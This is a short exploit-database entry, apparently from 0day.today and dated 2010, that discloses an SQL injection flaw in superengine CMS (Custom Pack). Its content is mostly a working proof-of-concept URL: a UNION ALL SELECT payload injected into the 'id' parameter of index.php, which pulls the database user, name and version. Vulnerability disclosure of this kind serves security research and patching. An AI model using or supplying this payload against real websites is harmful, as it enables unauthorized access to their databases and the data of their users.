id: 10905
date: 02/15/2010
title: superengine CMS (Custom Pack) SQL Injection Vulnerability
author: 10n1z3d
cves: 

=========================================================
superengine CMS (Custom Pack) SQL Injection Vulnerability
=========================================================

---------------------------------------------------------
superengine CMS (Custom Pack) SQL Injection Vulnerability
---------------------------------------------------------
Vendor: http://superengine.ro/
Vuln:
  http://[server]/index.php?mod=0&id=1[SQLI]
 
PoC:   
  http://[server]/index.php?mod=0&id=-1337+UNION+ALL+SELECT+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6
---------------------------------------------------------



#  0day.today [2023-03-23]  #